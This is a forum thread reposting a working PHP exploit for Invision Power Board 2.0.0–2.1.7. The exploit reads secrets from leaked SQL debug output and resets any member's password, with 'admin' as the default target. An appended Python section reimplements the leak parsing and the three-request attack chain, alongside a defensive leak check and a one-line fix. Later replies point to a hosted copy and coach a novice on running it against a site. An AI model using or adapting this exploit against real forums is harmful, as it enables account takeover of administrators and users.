Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

Started by insanity, 01 November 2006, 02:31:16 PM


insanity

<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Board 2.0.0 to 2.1.7
 by Rapigator

 This works if:

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on

 In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

// An existing user's login name
$name = "admin";

// The new password (3-32 characters)
$pass = "1234";

// You can use a proxy... (leave empty for a direct connection)
$proxy = "";
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);

// Step 1: fetch the registration page. With SQL debug output enabled the
// page leaks the INSERT into <prefix>_reg_antispam, i.e. the regid/regcode
// pair the registration and lost-password forms expect back.
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
    // "Debug Level 3" output: syntax-highlighted SQL
    $prefix  = $regs[1];
    $regid   = $regs[2];
    $regcode = $regs[3];
} else {
    // Fall back to the plain-text SQL debug output selected with &debug=1
    $suffix = "&debug=1";
    $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
        $prefix  = $regs[1];
        $regid   = $regs[2];
        $regcode = $regs[3];
    }
}
if (!isset($regid) || !isset($regcode)) {
    echo "Error: Probably not vulnerable, or no forum found";
    exit;
}

// Step 2: submit a lost-password request for the target user. The debug
// output leaks the INSERT into <prefix>_validating, which contains the
// validation key (vid) and the member id that the reset form accepts.
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode, $regid, $regs[1], $regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode, $regid, $regs[1], $regs[2]);
}

// Step 3: replay the leaked vid as the lost-password key and set the new password.
function change_pass($regcode, $regid, $vid, $userid) {
    global $site, $proxy, $suffix, $name, $pass;
    $curl = curl_init($site.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    echo "Password Changed!";
    exit;
}
?>


# milw0rm.com [2006-11-01]
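The whole attack rests on one information leak: with SQL debug output turned on, the forum prints the INSERT statements it just ran, including the secret regid/regcode pair and the lost-password validation key (vid). The following Python is an added example, not part of the milw0rm exploit, that isolates the parsing side of that leak so the two debug-output styles can be matched with one set of patterns, and adds a defensive check that names which sensitive queries a response body leaks. The sample responses are constructed here, the table prefix "ibf_", key values and IP are made up, and the exact layout of IPB's debug output is assumed from the regexes in the exploit above.

```python
import re

# Constructed samples of the SQL debug output the exploit parses. The markup
# is assumed from the exploit's regexes: "Debug Level 3" wraps keywords in
# <span> tags, "&debug=1" emits plain SQL. All values are made up.
HTML_ANTISPAM_SAMPLE = (
    "<span class='green'>INSERT</span> INTO "
    "<span class='purple'>ibf_reg_antispam</span> (regid,regcode,ip_address,ctime) "
    "VALUES('0123456789abcdef0123456789abcdef',41379,'127.0.0.1',1162388000)"
)
PLAIN_ANTISPAM_SAMPLE = (
    "INSERT INTO ibf_reg_antispam (regid,regcode,ip_address,ctime) "
    "VALUES('0123456789abcdef0123456789abcdef',41379,'127.0.0.1',1162388000)"
)
HTML_VALIDATING_SAMPLE = (
    "<span class='green'>INSERT</span> INTO "
    "<span class='purple'>ibf_validating</span> "
    "(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address) "
    "VALUES('fedcba9876543210fedcba9876543210',1,4,3,1162388000,0,1,'127.0.0.1')"
)

TAG_RE = re.compile(r"<[^>]+>")
ANTISPAM_RE = re.compile(
    r"INSERT INTO (\w+?)_reg_antispam \(regid,regcode,ip_address,ctime\) "
    r"VALUES\('(\w{32})',(\d+),"
)
VALIDATING_COLS = "(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address)"


def strip_debug_markup(body):
    """Reduce the highlighted (Debug Level 3) form to plain SQL, so one regex
    serves both output styles the exploit handles with separate patterns."""
    return TAG_RE.sub("", body)


def extract_antispam(body):
    """Return the table prefix and the regid/regcode pair from a leaked
    reg_antispam INSERT, or None when the page leaks nothing."""
    m = ANTISPAM_RE.search(strip_debug_markup(body))
    if not m:
        return None
    return {"prefix": m.group(1), "regid": m.group(2), "regcode": m.group(3)}


def extract_validating(body, prefix):
    """Return the validation key (vid) and member id from a leaked
    <prefix>_validating INSERT; the vid is what the lost-password form
    accepts as its 'aid' parameter."""
    pattern = re.compile(
        r"INSERT INTO " + re.escape(prefix) + r"_validating "
        + re.escape(VALIDATING_COLS) + r" VALUES\('(\w{32})',(\d{1,32}),"
    )
    m = pattern.search(strip_debug_markup(body))
    if not m:
        return None
    return {"vid": m.group(1), "member_id": m.group(2)}


def sql_debug_leak_indicators(body):
    """Defensive check: name the sensitive INSERTs a response body leaks, so a
    scanner or proxy rule can flag a forum that was left in debug mode."""
    text = strip_debug_markup(body)
    found = []
    for table in ("reg_antispam", "validating"):
        if re.search(r"INSERT INTO \w+?_" + table + r" \(", text):
            found.append(table)
    return found


def lostpass_request_sequence(site, name, antispam, validating, new_pass):
    """The three requests the exploit chains, as (method, url, fields) tuples,
    built from the parsed leaks; nothing is sent, the flow is just made visible."""
    return [
        ("GET", site + "?act=Reg&CODE=10", None),
        ("POST", site, {"act": "Reg", "CODE": "11", "member_name": name,
                        "regid": antispam["regid"], "reg_code": antispam["regcode"]}),
        ("POST", site, {"act": "Reg", "CODE": "03", "type": "lostpass",
                        "uid": validating["member_id"], "aid": validating["vid"],
                        "regid": antispam["regid"], "reg_code": antispam["regcode"],
                        "pass1": new_pass, "pass2": new_pass}),
    ]


if __name__ == "__main__":
    spam = extract_antispam(HTML_ANTISPAM_SAMPLE)
    val = extract_validating(HTML_VALIDATING_SAMPLE, spam["prefix"])
    print(spam, val)
    print(sql_debug_leak_indicators(HTML_ANTISPAM_SAMPLE + HTML_VALIDATING_SAMPLE))
    for step in lostpass_request_sequence("http://localhost/forums/index.php", "admin", spam, val, "1234"):
        print(step)
```

The fix on the server side is simply to turn SQL debug output off on any forum reachable by untrusted users; the leak-indicator check is the sort of thing to run against a forum after a configuration change, since neither the registration page nor the lost-password form needs authentication to trigger these queries.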

Fvox

Very good, man!

wuefez had already passed me the link to the site:
http://www.runescapebr.com/ipb.php


but I don't even know if he had the source
"Do you think you're falling into insanity? Dive in."




RT



RT; 8)

TEAM

Man, I don't get any of this, but I want to learn: where do I put this code? Do I need to download something?

Sladrak

Quote from: "TEAM": Man, I don't get any of this, but I want to learn: where do I put this code? Do I need to download something?

If you go to this site http://www.runescapebr.com/ipb.php you'll have the exploit ready to use, as our friends Fvox and Wufez said.
But to get it working you'd have to host it on a server that supports PHP...

TEAM

ah.. if I find some host to put http://www.runescapebr.com/ipb.php on

I'll host it and then just enter the site's URL, then the login, then the password??

But this code the guy posted,
is it on that site?

fast

RootDamages = FasT
FasT = RootDamages

the group is just me, there are no other members!! so it's not really a group hahaha

Anonymous

Good Topic^^ :)